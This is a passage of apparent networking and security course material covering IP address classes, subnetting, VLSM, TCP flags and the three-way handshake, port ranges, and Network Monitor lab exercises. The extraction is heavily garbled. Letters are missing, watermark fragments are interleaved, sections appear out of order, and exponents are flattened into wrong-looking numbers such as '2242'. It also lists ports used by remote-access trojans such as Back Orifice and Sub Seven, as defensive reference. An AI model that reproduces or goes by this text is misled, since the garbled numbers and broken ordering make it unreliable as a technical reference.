Another way to derive this result is to rst convert from decimal to binary, then convert binary to hexadecimal four bits at a time, and nally, combine the results, as shown here: 2. 3. 4. 5. 6. 7. 8. 9. Decimal 168 is the same as binary 10101000. Decimal 10 is the same as binary 00001010. Decimal 1 is the same as binary 00000001. Binary 0000 is the same as Hex 0. Binary 1000 is the same as Hex 8. Binary 0000 is the same as Hex 0.
Binary 1100 (the rst four bits of the rst octet) is the same as Hex C. Binary 1010 is the same as Hex A.
Ed
T DU
1.
Decimal 192 is the same as binary 11000000.
or
DO NO
10. Binary 1010 is the same as Hex A.
In
st
ru ct
IP Address Classes

11. Binary 0000 is the same as Hex 0. 12. Binary 0001 is the same as Hex 1.
13. Combining the Hex equivalents shows that decimal 192.168.10.1 is equal to Hex C0A80A01.
There are ve dened classes of IP addresses: Class A, Class B, Class C, Class D, and Class E. The details of each class are as follows: Class A IP addresses use the rst 8 bits of an IP address to dene the network, and the remaining 24 bits to dene the host. This means there can be more than 16 million hosts in each Class A network (2242, because all 1s and all 0s cannot be used as host addresses). All Class A IP addresses will have a rst octet of 0xxxxxxx in binary format. 10.10.10.10 is an example of a Class A IP address. Class B IP addresses use the rst 16 bits to dene the network, and the remaining 16 bits to dene the host. This means there can be more than 65,000 hosts in each Class B network (2162). All Class B IP addresses will have a rst octet of 10xxxxxx in binary format. 172.16.31.200 is an example of a Class B IP address. Class C IP addresses use the rst 24 bits to dene the network, and the remaining 8 bits to dene the host. This means there can be only 254 hosts
PL
IC
AT
iti
Combining the results of each conversion shows that decimal 192.168.10.1 is equal to Hex C0A80A01.
on
2.
Divide 168 by 16. The result is 10, with a remainder of 8. Because decimal 10 is the same as Hex A and decimal 8 is the same as Hex 8, decimal 168 is equal to Hex A8.
in each Class C network (282). All Class C IP addresses will have a rst octet of 110xxxxx in binary format. 192.168.10.1 is an example of a Class C IP address. Class D IP addressing is not used for hosts, but is often used for multicasting (which will be discussed later), where there is more than one recipient. The rst-octet binary value of a Class D IP address is 1110xxxx. 224.0.0.9 is an example of a Class D IP address. Class E IP addressing is used for experimental functions and for future use. It does have a dened rst-octet binary value as well. All Class E IP addresses have a rst octet binary value of 11110xxx. 241.1.2.3 is an example of a Class E IP address.
Ed or
DO NO
Figure 1-4: IP address classes and their rst-octet values.
AT PL IC
Private IP Addresses and Special-function IP Addresses

There are several ranges of IP addresses that are not used on the Internet. These addresses are known as private, or reserved, IP addresses. Dened in RFC 1918, any host on any network can use these addresses, but these addresses are not meant to be used on the Internet, and most routers will not forward them. By using these reserved IP addresses, organizations do not have to be as concerned with address conicts. The dened private addresses for the three main address classes (A, B, and C) are: Class A: 10.0.0.0 to 10.255.255.255
ru ct
Class B: 172.16.0.0 to 172.31.255.255
Class C: 192.168.0.0 to 192.168.255.255
In
st
In addition to the private address ranges listed, there are a few other address ranges that have other functions. The rst is the range of 127.0.0.0 to 127.255. 255.255. This address range is used for diagnostic purposes, with the common address of 127.0.0.1 used to identify IP on the host itself. The second range is 169.254.0.0 to 169.254.255.255. This address range is used by Microsoft to allocate addresses to hosts, for Automatic Private IP Addressing (APIPA).
DU
E
IP Address Classes and Their First-octet Values IP Addresses Not Seen on the Internet
iti
9
on
The Subnet Mask

Along with an IP address, each host that uses TCP/IP has a subnet mask. The subnet mask is used during a process called ANDing to determine the network to which the host belongs. The way the mask identies the network is by the number of bits allocated, or masked, for the network. A bit that is masked is identied with a binary value of 1. By default, a Class A IP address has 8 bits masked to identify the network, a Class B IP address has 16 bits masked to identify the network, and a Class C IP address has 24 bits masked to identify the network. These default subnet masks use contiguous bits to create the full mask. The following table shows the default subnet masks for the three classes, rst in binary, then in the more traditional dotted decimal format. Default Subnet Masks Class
A B C
Default Subnet Masks
Binary Format
11111111.00000000.00000000.00000000 11111111.11111111.00000000.00000000 11111111.11111111.11111111.00000000
Ed
T DU
or
DO NO
st
In
10
ru ct
2.
In the event that you need to split a network into more than one range, such as having different buildings or oors, you will need to subdivide the network. The following example will step you through the process of splitting a network and creating the subnet mask necessary to support the resulting subnetworks. Lets say you have been assigned the 10.0.0.0 network with the 255.0.0.0 subnet mask and need to break this up into 12 network ranges to support, for example, the 12 major departments in your corporate building. Heres what you should do: 1. Determine how many bits, in binary, it takes to make up the number of subnetworks you need to create. In binary, 12 is 1100, so you will need 4 bits. Take 4 bits from the host side of the subnet mask and AND them to the network side, effectively changing your subnet mask from 255.0.0.0 to 255.240. 0.0. As you know, the subnet mask tells you where the dividing line between network and host bits reside. You started with a network ID of 10.0.0.0 and subnet mask of 255.0.0.0, which in binary looks like this: 00001010.00000000.00000000.00000000 (IP address for network) 11111111.00000000.00000000.00000000 (subnet mask) Your dividing line is at the end of the rst octet (eight bits starting from the left). You have one big network with a network ID of 10.0.0.0, a
PL
Subnetting Example
IC
The subnet mask can be represented in different formats. For example, one common format is to list the IP address followed by the full subnet mask, such as this: 192.168.10.1 255.255.255.0. Another option, and one that is easier to write, is to count and record the number of bits that are used as 1s in the subnet mask. For example, in the default subnet mask for Class C there are 24 bits designated as 1. So, to use the second format, list the IP address followed by a slash and the number of bits masked, such as this: 192.168.10.1/24.
AT
iti
on
255.0.0.0 255.255.0.0 255.255.255.0
Dotted Decimal Format
range of usable addresses from: 10.0.0.1 to 10.255.255.254, and a broadcast address of 10.255.255.255. The new, divided network looks like this: 00001010.0000 0000.00000000.00000000 (IP address for network) 11111111.1111 0000.00000000.00000000 (subnet mask) Notice that the network/host dividing line is now in the middle of the second octet. All of your networks will have binary addresses that will look like this: 00001010.xxxx yyyy.yyyyyyyy.yyyyyyyy, where x represents one of the variable bits used to create your subnetworks and y represents a bit on the host side of the address.
3.
ru ct
st
In
Notice that you needed only 12 networks, but you have 16. That can happen, depending on the number of networks needed. For example, if you had needed 20 networks, you would have needed to move the network/host dividing line over 5 bits to the right (20 in binary is 10100, so 5 bits must be used). In that case, you would have had a subnet mask of 255.248.0.0 (instead of the 255.240.0.0 that you used for the rst example), which would have given you 32 subnetworks, even though you needed only 20. Consider it room for corporate growth!
DO
For the rst network, the network ID is 10.0.0.0 with a subnet mask of 255.240. 0.0. The rst usable address is 10.0.0.1, and the last usable address is 10.15.255. 254. The broadcast address is 10.15.255.255 (the next possible IP address would be 10.16.0.0, which is the network ID of the second network). The second network has an ID of 10.16.0.0, a usable range of 10.16.0.1 to 10.16.255.254, and a broadcast address of 10.16.255.255.
NO
DU
First Second Third Fourth Fifth Sixth Seventh Eighth Ninth Tenth Eleventh Twelfth Thirteenth Fourteenth Fifteenth Sixteenth
00001010.0000 0000.00000000.00000000 00001010.0001 0000.00000000.00000000 00001010.0010 0000.00000000.00000000 00001010.0011 0000.00000000.00000000 00001010.0100 0000.00000000.00000000 00001010.0101 0000.00000000.00000000 00001010.0110 0000.00000000.00000000 00001010.0111 0000.00000000.00000000 00001010.1000 0000.00000000.00000000 00001010.1001 0000.00000000.00000000 00001010.1010 0000.00000000.00000000 00001010.1011 0000.00000000.00000000 00001010.1100 0000.00000000.00000000 00001010.1101 0000.00000000.00000000 00001010.1110 0000.00000000.00000000 00001010.1111 0000.00000000.00000000
Ed
10.0.0.0 10.16.0.0 10.32.0.0 10.48.0.0 10.64.0.0 10.80.0.0 10.96.0.0 10.112.0.0 10.128.0.0 10.144.0.0 10.160.0.0 10.176.0.0 10.192.0.0 10.208.0.0 10.224.0.0 10.240.0.0
Subnetwork
Binary Address
Decimal Address
or
PL
IC
AT
E
11
iti
Determine the subnetwork addresses by changing the value of the x bits. The rst possible permutation is the 00001010.0000 network; the second is the 00001010.0001 network, and so forth. The following table lists all of the possible subnetwork addresses (notice the pattern?).
on
Note that any combination of addressing can be represented in different text. For example, you may come across a resource that denes the IP address in decimal, and the subnet mask in hexadecimal. You must be able to quickly recognize the addressing as dened. Use the following task to test your ability to quickly perform these conversions.
TASK 1A-1
1.
Layering and Address Conversions
Describe how layering is benecial to the function of networking. By using a layered model, network communications can be broken into smaller chunks. These smaller chunks can each have a specic purpose, or function, and in the event an error happens in one chunk, it is possible that only that error be addressed, instead of starting over from scratch.
2.
If you have an IP address of 192.168.10.1 and a subnet mask of FF-FF00-00, to which IP network does your computer belong? Provide both decimal and Hex notations. In decimal, the network address is 192.168.0.0; in Hex, the network address is C0-A8-00-00.
Ed
T DU
or
DO NO
In decimal, the network address is 192.168.0.0; in Hex the network address is C0-A8-00-00.
12
In
router: An interconnection device that is similar to a bridge but serves packets or frames containing certain protocols. Routers link LANs at the Network Layer.
st
ru ct
Routing
We will get into routing in more detail later, but we need to address the basics now. Being familiar with a network and how one host will communicate with another host within the same network, what do you think will happen if a host needs to send information to a host that is not in its network? This is exactly the situation where routing is needed. You need to route that information from your network to the receiving hosts network. Of course, the device that makes this possible is the router. The rst router you will encounter on your way out of your network is the default gateway. This is the device that your computer will send all traffic to, once it determines that the destination host is not local (on the same network as itself). After the default gateway gets a packet of information destined for host User1 on network X, it looks at its routing table (think of this as a sort of directorytelling the router that traffic destined for networks C, G, F, and X should go out interface 1, traffic destined for networks E, A, B, and R should go out interface 2, and so forth), then the router forwards the packet out through interface 1. The destination network may or may not be attached to interface 1the router doesnt really care at this pointit just forwards the packet on according to the information in its routing table. This process
PL
IC
AT
3.
If you have an IP address of C0-A8-0A-01 and a subnet mask of /16, to which IP network does your computer belong? Provide both decimal and Hex notations.
iti
on
repeats from one router to the next until the packet nally reaches the router that is attached to the same network as the destination host. When the packet reaches this router, which is usually also the destination hosts default gateway, it is sent out on the network as a unicast directed to the destination host User1.
VLSM and CIDR
This time, lets represent the IP addresses and subnet masks using the slash method: 10.48.0.0/12. Notice the IP address stays the same, but we replace the subnet mask with /12 to tell others that the subnet mask has 12 1s in it (which, of course, corresponds to 255.240.0.0). Now, back to the IT staffs networking issue. You have an already subnetted network (10.48.0.0/12) that you would like to split into ve smaller networks. To begin, you need to ask the same starting question: How many bits does it take to make 5? In binary, 5 is 101, so you will need three bits. Then, add three bits to the present subnet mask (dont worry that it has already been subnetted before that doesnt matter). So, now you have 10.48.0.0/15 as your rst network address and new subnet mask.
Ed
Decimal Address
10.48.0.0 10.50.0.0 10.52.0.0 10.54.0.0 10.56.0.0 10.58.0.0 10.60.0.0 10.62.0.0
Think back to the previous example of subnet masking. In particular, lets take a closer look at the fourth network. It was intended to be used by the IT staff; however, they want to be able to break the rather large network block given to them into smaller, more manageable blocks. Specically, they need ve smaller subnetworks to be created from their network block of 10.48.0.0 with a subnet mask of 255.240.0.0.
or
DO NO
So, what are the new network addresses? Subnetwork

First Second Third Fourth Fifth Sixth Seventh Eighth
Binary Address
In
00001010.0011000 0.00000000.00000000 00001010.0011001 0.00000000.00000000 00001010.0011010 0.00000000.00000000 00001010.0011011 0.00000000.00000000 00001010.0011100 0.00000000.00000000 00001010.0011101 0.00000000.00000000 00001010.0011110 0.00000000.00000000 00001010.0011111 0.00000000.00000000
st
DU
The new variable range is 00001010.0011xxx y.yyyyyyyy.yyyyyyyy, where the binary numbers will not change, x represents the variable bits that will make up the networks, and y designates the host bits.
ru ct
PL
IC
AT
E
13
iti
The standard methods of subnet masking discussed earlier are effective; however, there are instances where further subdividing is required, or more control of the addressing of the network is desired. In these cases, you can use either of the following two options: Variable Length Subnet Masking (VLSM) or Classless Interdomain Routing (CIDR).
on
For the rst network, the network ID is 10.48.0.0, the usable addresses are 10.48. 0.1 to 10.49.255.254, and the broadcast address is 10.49.255.255; for the second, the network ID is 10.50.0.0, the usable addresses are 10.50.0.1 to 10.51.255.254, and the broadcast address is 10.51.255.255, and so forth. Did you notice that you have eight possible networks when you needed only ve? Again, you can consider it just having more room for expansion.
X-casting
X-casting
or
DO NO
ru ct
TASK 1A-2
1.
A multicast is a communication that is sent out to a group of receivers on the network. Multicasting is often implemented as a means for directing trafc from the presenter of a videoconference to the audience. In comparison to the broadcast, which all receivers on the segment will receive, those who wish to receive a multicast must join a group to do so. Group membership is often very dynamic and controlled by a user or an application. Currently, Class D addresses are used for multicasting purposes. Remember, Class D has IP addresses in the range of 224.0.0.0 to 239.255.255.255.
In
14
st
Routers and Subnetting

You are using a host that has an IP address of 192.168.10.23 and a subnet mask of 255.255.255.0. You are trying to reach a host with the IP address 192.168.11.23. Will you need to go through a router? Explain your response. Yes, you will need to go through a router. Your subnet mask denes you as belonging to network 192.168.10.0, and the remote host you are trying to reach does not belong to your network. 2. Boot your computer to Windows 2000, and log on as Administrator, with a blank (null) password.
DU
PL
IC
A broadcast is a communication that is sent out from a single transmitting host and is destined for all possible receivers on a segment (generally, everyone in the network, since the routers that direct traffic from one network to another are generally used to stop broadcasts, thereby creating broadcast domain boundaries). Broadcasting can be done for many reasons, such as locating another host. For a MAC broadcast, the broadcast address used is FF:FF:FF:FF:FF:FF. For an IP broadcast, the address used is based on the network settings. For example, if you are on network 192.168.10.0/24 the broadcast address is 192.168.10.255.
Ed
Unicast is a term that was created after multicasting and broadcasting were already dened. A unicast is a directed communication between a single transmitter and a single receiver. This is how most communication between two hosts happens, with Host A specically communicating with Host B.
AT
iti
When a packet is sent from one host to another, the process of routing functions and the packet is sent as dened. However, the process is different if one host is trying to reach more than one destination, or if one message is to be received by every other host in the network. These types of communication are referred to as broadcasting, multicasting, and unicasting.
on
3.
From the Start menu, choose SettingsNetwork And Dial-up Connections. Right-click the Classroom Hub interface and choose Properties. Select Internet Protocol (TCP/IP) and click Properties. Click the Advanced button, and verify that the IP Settings tab is displayed. Under Default Gateways, record the IP address here:
Be prepared to diagram or otherwise explain the classroom setup.
4. 5.
For the LEFT side of the classroom, the Default Gateway is 172.16.0.1. For the RIGHT side, it is 172.18.0.1. 6. 7. Select the IP address you just recorded, and click Remove. Click OK three times.
Ed
T DU PL IC
Open a command prompt, and ping an address that is not on your local network. For instance, if you are on the LEFT side of the classroom, you could ping an address in the 172.18.10.0 network, and if you are on the RIGHT side of the classroom, you could ping an address in the 172.16.10.0 network. Observe the message you receive. The text Destination Host unreachable is displayed. Your computer knows that the ping packet is supposed to go to a computer that is outside your local network but it does not know how to get it there.
8.
9.
Switch to the Network And Dial-up Connections Control Panel, and display the properties of the Classroom Hub interface.
11. In the TCP/IP Gateway Address box, enter the IP address you recorded earlier in the task, click Add, and click OK three times. 12. Switch back to the command prompt, and try to ping the remote address again.
st
14. Close all open windows.
In
DO
13. Observe the message you receive. This time, as long as the other computers default gateway is correctly congured, you should be successful in pinging the remote computer. This is because your computer now knows to send traffic to the router if that traffic is destined for another network. (How the routers know where to send the traffic is covered later in the course.) Contact your instructor if your ping attempt is not successful.
ru ct
10. Select Internet Protocol (TCP/IP), click Properties, and click Advanced. On the IP Settings tab, click the Add button found in the Default Gateway area.
NO
or
AT
Students must be able to ping all computers within the classroom for the remaining tasks to work properly. If any students are not successful in the second ping attempt, help them troubleshoot the issue.
E
15
iti
The recommended classroom layout is shown in Figure 0-1.
on
Topic 1B
Analyzing the Three-way Handshake
security: A condition that results from the establishment and maintenance of protective measures that ensure a state of inviolability from hostile acts or inuences.
Comparing TCP and UDP TCP

Connection-oriented Slower communications Considered reliable Transport Layer
ru ct
TCP Features
st
16
In
DO
NO
TCP provides the functions of connection-oriented communication by using features such as the three-way handshake, acknowledgements, and sequence numbers. In addition to these features, a signicant part of TCP is the use of control ags. There are six TCP control ags in a TCP header, each with a specic meaning.
DU
PL
UDP is considered faster because less work is done between the two hosts that are communicating. Host 1 simply sends a packet to the address of host 2. There is nothing built into UDP to provide for host 1 checking to see if host 2 received the packet, or for host 2 sending a message back to host 1, acknowledging receipt.
or
IC
AT
TCP provides a connection-oriented means of communication, whereas UDP provides connectionless communication. The connection-oriented function of TCP means it can ensure reliable transmission, and can recover if transmission errors occur. The connectionless function of UDP means that packets are sent with the understanding they will make it to the other host, with no means of ensuring the reliability of the transmission.
Ed
Comparing TCP and UDP
iti
UDP
Connectionless Faster communications Considered unreliable Transport Layer
on
Although a great deal of emphasis is given to IP due to the addressing and masking issues, TCP deserves equal attention from the security professional. In addition to TCP, the other protocol that functions as a transport protocol is UDP. This topic will concentrate on TCP; however, a brief discussion on UDP is warranted. The following table provides a brief comparison of the two protocols.
TCP Flags
The TCP ags are: SYN, ACK, FIN, RESET, PUSH, and URGENT. These ags may also be identied as S, ack, F, R, P, and urg. Each of these ags occupies the space of one bit in the header, and if they are assigned a value of 1, they are considered on. The function of each ag is identied as follows: The SYN, or S, ag represents the rst part of establishing a connection. The synchronizing of communication will generally be in the rst packet of communication. The ACK, or ack, ag represents acknowledgement of receipt of data from the sending host. This is sent during the second part of establishing a connection, in response to the sending hosts SYN request.
The RESET, or R, ag represents the senders intentions to reset the communication.
The URGENT, or urg, ag represents that this data should take precedence over other data transmissions.
Sequence and Acknowledgement Numbers
Ed
T DU PL IC
The PUSH, or P, ag is used when the sending host requires data to be pushed directly to the receiving application, and not ll in a buffer.
Sequence Numbers
st
Acknowledgement Numbers
In the event that the sending host does not receive an acknowledgement for a transmitted packet in the dened timeframe, the sender will retransmit the packet. This is how TCP provides reliable delivery. If a packet seems to have been lost, the sender will retransmit it.
In
The acknowledgement number is also found in the TCP header of each TCP packet, and is also a 32-bit value. These numbers allow the two hosts to be given a receipt of data delivery. An acknowledgement number is in the packet header in response to a sequence number in the sending packet.
DO
NO
When a host sends the request to initiate a new connection, an Initial Sequence Number (ISN) must be chosen. There are different algorithms by different vendors for the choosing of an ISN; however, RFC 793 states that the ISN is to be a 32-bit number that increments by one every 4 microseconds.
ru ct
The sequence number is found in the TCP header of each TCP packet and is a 32-bit value. These numbers allow the two hosts a common ground for communication, and allow for the hosts to identify packets sent and received. If a large Web page requires several TCP packets for transmission, sequence numbers are used by the receiving host to reassemble the packets in the proper order and provide the full Web page for viewing.
or
In addition to the TCP ags, another critical issue of TCP is that of numbers: sequence and acknowledgement numbers, to be specic. Because TCP has been dened as a reliable protocol that has the ability to provide for connectionoriented communication, there must be a mechanism to provide these features. Sequence and acknowledgement numbers are what provide this.
AT
E
17
iti
The FIN, or F, ag represents the senders intentions of terminating the communication in what is known as a graceful manner.
on
TCP Flags
Connections
All communication in TCP/IP is done with connections between two hosts. Each connection is opened (or established), data is sent, and the connection is closed (or torn down). These connections have very specic rules they must follow. There are two different states of the open portion of this process: Passive Open and Active Open. Passive Open is when a running application tells TCP that it is ready to receive inbound requests via TCP. The application is assuming inbound requests are coming, and is prepared to serve those requests. This is also known as the listening state, as the application is listening for requests to communicate.
Connection Establishment
SYN = 1 (The session is being synchronized.)
Sequence Number = x, where x is a variable. (x is Host As ISN.) Acknowledgement Number = 0
ru ct
2.
SYN = 1 (The session is still being synchronized.)
Acknowledgement Number = x + 1 (The sequence number from Host A, plus 1.)
st
SYN = 0 (Session is synchronized with this segment; further requests are not needed.) ACK = 1 (The ack ag is set in response to the SYN from the previous segment.) Sequence Number = x + 1 (This is the next sequence number in series.) Acknowledgement Number = y + 1 (The sequence number from Host C, plus 1.)
18
In
DO
3.
Host A receives Host Cs segment and responds to Host C with the following:
NO
Sequence Number = y, where y is a variable. (y is Host Cs ISN.)
ACK = 1 (The acknowledgement ag is now set, as there is an ack value in this segment.)
DU
Host C receives Host As segment and responds to Host A with the following:
PL
IC
ACK = 0 (There is no value in the ACK eld, so this ag is a 0.)
or
AT
In order for the sequence and acknowledgement numbers to have any function, a session between the two hosts must be established. This connection establishment is called the three-way handshake. The three-way handshake involves three distinct steps, which are detailed as follows (please refer to Figure 1-5 when reading this section): 1. Host A sends a segment to Host C with the following:
Ed
iti
Active Open is when a running application tells TCP to start a communication session with a remote host (which is in Passive Open state). It is possible for two hosts in Active Open to begin communication. It is not a requirement that the remote host be in Passive Open, but that is the most common scenario.
on
At this point, the hosts are synchronized and the session is established in both directions, with data transfer to follow.
The Three-way Handshake
Figure 1-5: The three-way handshake.
Connection Termination
ru ct
st
FIN = 1 (The session is being terminated.)
ACK = 1 (There is an ack number, based on current communication.)
2.
In
Sequence Number (FIN number) = s (s is a variable based on the current communication.) Acknowledgement Number = p (p is a variable based on the current communication.) FIN = 0 (This segment is not requesting closure of the session.) ACK = 1 (This segment does contain an ack number.)
Lesson 1: Advanced TCP/IP 19
Host C receives Host As segment and replies with the following:
DO
Similar to the Active and Passive Opens mentioned earlier, there are also Active and Passive Closes. The host that begins the termination sequence, by sending the rst FIN, is the host performing the Active Close. The host that receives the rst FIN is the host that is performing the Passive Close. The graceful teardown of a session is detailed as follows (please refer to Figure 1-6 when reading this section): 1. Host A initiates the session termination to Host C with the following:
NO
DU
As you saw earlier, it requires three segments to establish a TCP session between two hosts. The other side of the session, the graceful termination, requires four segments. Four segments are required because TCP is a full-duplex communication protocol (meaning data can be owing in both directions independently). As per the specications of TCP, either end of a communication can end the session by sending a FIN, which has a sequence number just as a SYN has a sequence number.
or
PL
IC
AT
A graceful shutdown happens when one host sends a message (using the FIN ag) to the other, stating it is time to end the session; the other acknowledges; and they both end the session. A non-graceful shutdown happens when one host simply sends a message (using the RESET ag) to the other, indicating the communication has stopped, with no acknowledgements and no further messages sent. In this section, we will investigate the details of the standard graceful termination.
Ed
In addition to specic steps that are involved in the establishment of a session between two hosts, there are equally specic steps in the termination of the session. There are two methods of ending a session using TCP. One is considered graceful, and the other is non-graceful.
iti
on
Sequence Number = Not Present (As there is no FIN, there is no sequence number required.) Acknowledgement Number = s + 1 (This is the response to Host As FIN.) 3.
FIN = 1 (The session is being terminated.) ACK = 1 (There is an ack number.)
Sequence Number = p (p is a variable based on the current communication.)
4.
Host A receives the segments from Host C and replies with the following: FIN = 0 (This segment does not request a termination, there is no SYN.) ACK = 1 (This segment does contain an ack number.) Sequence Number = Not Present Acknowledgement Number = p + 1 (This is Host Cs sequence number, plus 1.)
Connection Termination
or ru ct
Figure 1-6: Connection termination.
st
Ports
20
In
You have been introduced to the fact that IP deals with addressing and the sending/receiving of data between two hosts, and you have been introduced to the fact that TCP can be selected to provide reliable delivery of data. However, if a client sends a request to a server that is running many services, such as WWW, NNTP, SMTP, and FTP, how does the server know which application is supposed to receive the request? The answer is by specifying ports.
DO
NO
DU
PL
IC
AT
At this point the session has been terminated. Communication in both directions has had a FIN requested and an acknowledgement to the FIN, closing the session.
Ed
iti
Acknowledgement Number = s + 1 (This is the same as in the previous segment.)
on
Host C initiates the session termination in the opposite direction with the following:
Port numbers are located in the TCP or UDP header, and they are 16-bit values, ranging from 0 to 65535. Port numbers can be assigned to specic functions or applications. Ports can also be left open for dynamic use by two hosts during communication. There are ranges of ports for each function. There are three main categories of ports: well-known, registered, and dynamic.
Registered ports are those in the range of 1024 to 49151. These port numbers can be registered to a specic function, but are not dened or controlled by a governing body, so multiple functions could end up using the same port. Dynamic ports (also called private ports) are those from 49152 to 65535. Any user of the Internet can use dynamic ports.
ru ct
Service
Telnet HTTP (Standard Web pages) Secure HTTP (Secure Web pages) FTP (Data and control) DNS SMTP NNTP
The following table lists some of the well-known ports and their associated services.
Port
23 80 443 20 and 21 53 25 119
st
In
DO
NO
Some Well-known Ports and their Services
DU
Some Well-known Ports and Their Services
PL
When a client connects to a server and requests a resource, that client also requires a port. The client ports (also called ephemeral ports by some) are used by a client during one specic connection; each subsequent connection will use a different port number. These ports are not assigned to any default service, and are usually a number greater than 1023. There is no dened range for client ports; they can cover the numbers of both the registered and dynamic port ranges. When a client begins a session by requesting a service from a server, such as the WWW service on port 80, the client uses an ephemeral port on the client side. This enables the server to respond to the client. Data is then exchanged between the two hosts using the port numbers established for that session: 80 on the server side, and a dynamic number greater than 1023 on the client side. The combination of the IP address and port is often referred to as a socket, and the two hosts together are using a socket pair to communicate for this session.
Ed
IC
or
AT
E
21
iti
on
The well-known ports (also called reserved ports by some) are those in the range of 0 to 1023. These port numbers are assigned to specic applications and need to remain constant for the primary services of the Internet to continue to provide the exibility and usefulness it does today. For example, the WWW service is port 80, the Telnet service is port 23, the SMTP service is port 25, and so on. The well-known port list is maintained by the Internet Assigned Numbers Authority (IANA), and can be found here: www.iana.org/assignments/port-numbers.
Categories of Ports
In addition to known valid services, such as those listed previously, there are many Trojan Horse programs that use specic ports (although the port can usually be changed).
Trojan Horse: An apparently useful and innocent program containing additional hidden code which allows the unauthorized collection, exploitation, falsication, or destruction of data.
Ports Associated with Trojan Horses
Ports Associated with Trojan Horses
Some of the things you can do with Network Monitor are: Analyze network traffic.
Filter specic protocols to capture.
ru ct st
In
DO
NO
DU
In this lesson, you will be focusing on the capture and analysis of IP packets, and on the details of the protocol suite.
PL
IC
Monitor real-time network traffic.
or
AT
There is a very valuable tool available with Windows called Network Monitor. This tool allows for full packet capture and lets the analyst (you) peer into the packets contents, examining both the payload, or data, and the headers, in detail. You can see any set agss dened sequence and acknowledgement numbers, packet size, and more. The following is a discussion on the use of Network Monitor, provided as background for you to be able to perform the tasks in this lesson.
Ed
Network Monitor
iti
12345 1243 27374 31337 54320 (TCP) 54321 (UDP)
NetBus Sub Seven Sub Seven 2.1 Back Orice Back Orice 2000 (BO2K) Back Orice 2000 (BO2K)
on
Port Number
Name of Trojan Horse
Figure 1-7: The default view of Network Monitor, showing the various panes.
Ed
T DU PL IC
The top bar is the standard menu bar found in Microsoft programs. The basic functions on the toolbar that you will use in this lesson are contained in the File and Capture menus. The File menu contains three commands: Open, Save As, and Exit. Choose Save As to save a Network Monitor capture. Choose Exit to exit.
The Capture menu has more commands: Start, Stop, Stop And View, Pause, and Continue. The Start, Pause, and Continue commands are self-explanatory. The difference between Stop and Stop And View is that the Stop command ends the capture. The Stop And View command ends the capture and switches Network Monitor to its next mode, Display View.
st
The other sections of the Capture View are panes (windows in a window) called Graph, Session Stats, Station Stats, and Total Stats. The Graph pane provides ve bars that measure percentages of pre-dened metrics.
In
The top graph indicates the percentage (%) of network utilization, meaning how much the network is being used. The second graph indicates the number of frames per second, meaning frames transmitted per second over the network. The third graph indicates the number of bytes per second that are transmitted over the network.
DO
ru ct
Choose Open to open a previously saved Network Monitor capture.
NO
or
AT
In Figure 1-7, you can see the default view of Network Monitor. In this view, the screen is split into several sections.
iti
on
The fourth graph indicates the number of broadcasts per second that are transmitted over the network. The fth graph indicates the number of multicasts per second that are transmitted over the network.
The next pane is the Session Stats pane. In this pane, you can see the sessions that are taking place during the capture. Following the Session Stats is the Station Stats pane. In this pane, you can see statistics per interface on the host, per broadcast, per multicast, and more. The nal pane in this view is the Total Stats pane. The Total Stats pane is subdivided into sections: Network Statistics, Captured Statistics, Per Second Statistics, Network Card (MAC) Statistics, and Network Card (MAC) Error Statistics. From this pane, you can identify frames, broadcasts, multicasts, network utilization, errors, and more, all in realtime during the capture.
Displaying Captures
or ru ct st In
Figure 1-8: The Summary View of Network Monitor. When you rst open the Summary View, as shown in Figure 1-8, you will see a timeline of packets captured. By double-clicking any packet that was captured, you can look into its details and bring up the next view of Network Monitor. Once you have selected a packet, Network Monitor displays three panes for presenting information to you.
DO
NO
DU
PL
IC
AT
After you have captured network traffic, you can begin your analysis, which requires a different view of Network Monitor. You will need to use the Display View. You can switch to the Display View by either using the CaptureStop And View command or by using the Display Captured Data command after a capture session has been stopped.
Ed
iti
on
While a capture is running, these graphs work in realtime, providing current data.
Figure 1-9: The details of a packet in Network Monitor.
Ed
T DU PL IC
Time the packet was captured Protocol used Destination and source IP addresses
Destination and source MAC addresses
The middle pane shown in Figure 1-9 is the Detail pane. This pane provides the actual details of the protocol for the selected packet. Any line that has a plus sign next to it can be expanded for further detail. The bottom pane in Figure 1-9 is the Hex pane. This pane provides the actual Hex value for the raw data that each frame is comprised of. When you select something in the Detail pane, it is highlighted in the Hex pane for comparison. Also, in this pane, the ASCII characters are visible. In the event that cleartext is captured, this is where it will be readable.
st
Network Monitor Filters
Because Network Monitor has the ability to capture all network traffic, it would be very easy to capture too much information and have difficulty in nding what you were looking for. This is where ltering comes into play. There are two types of lters available in Network Monitor: capture lters and display lters. For example, if you wanted to capture only TCP messages, you could create a capture lter so that only TCP messages are captured. If you wanted to view only ICMP messages, you could create a display lter so that all you see are ICMP messages. Figure 1-10 and Figure 1-11 show the dialog boxes used for each lter type.
In
DO
ru ct
NO
or
AT
The top pane shown in Figure 1-9 is the Summary pane. This pane provides the basic details of a packet, such as: Frame number
E
25
iti
on
To create or use lters, choose CaptureFilter. Using lters not only makes it easier for you, as an analyst, to nd what you are looking for, but they allow for the buffer that stores the capture to not be lled with useless information.
Ed
T DU
Figure 1-10: Network Monitors Capture Filter dialog box.
or
DO NO
Figure 1-11 shows the Display Filter dialog box.
In
26
st
ru ct
Figure 1-11: Network Monitors Display Filter dialog box.
PL
IC
AT
iti
on
TASK 1B-1
Using Network Monitor
1. Open a command prompt, and enter ipcong /all.
4.
Open Network Monitor. (From the Start menu, choose Programs Administrative ToolsNetwork Monitor.)
st
5.
6.
In
If you see the Select Default Network message box, click OK to display the Select A Network dialog box. Expand the + sign next to Local Computer, select the interface with the MAC address associated with the Classroom Hub interface, and click OK. Choose CaptureStart, or press the F10 key to start a capture.
DO
NO
When you run Network Monitor the rst time on a multi-homed computer, you might receive the following pop-up warning, or one similar to it.
DU
3.
Close the Command Prompt window.
ru ct
PL
MAC address IP address MAC address IP address
Each card will have a unique MAC address. Each card will have a unique IP address. Each card will have a unique MAC address. Each card will have a unique IP address.
or
IC
AT
2.
Record the MAC and IP addresses for the two network cards in your computer.
Ed
If you are on the LEFT side of the classroom, your IP addresses will be 172. 16.10.x (for the network card connected to the classroom hub) and 172.26. 10.x (for the network card connected to your partners computer via a crossover cable). If you are on the RIGHT side of the classroom, your IP addresses will be 172.18.10.x (for the network card connected to the classroom hub) and 172.28.10.x (for the network card connected to your partners computer via a crossover cable).
iti
on
When using ltering, you will likely use either protocol or address ltering. With protocol ltering, you identify a specic protocol to work with. With address ltering, you again dene the specic address to lter. Filters can be implemented in different directions, either traffic into this host, outbound from this host, or in both directions. These options are implemented by selecting the appropriate arrow (one of these three: --->, ---<, or <-->) for the function you want to perform.
7.
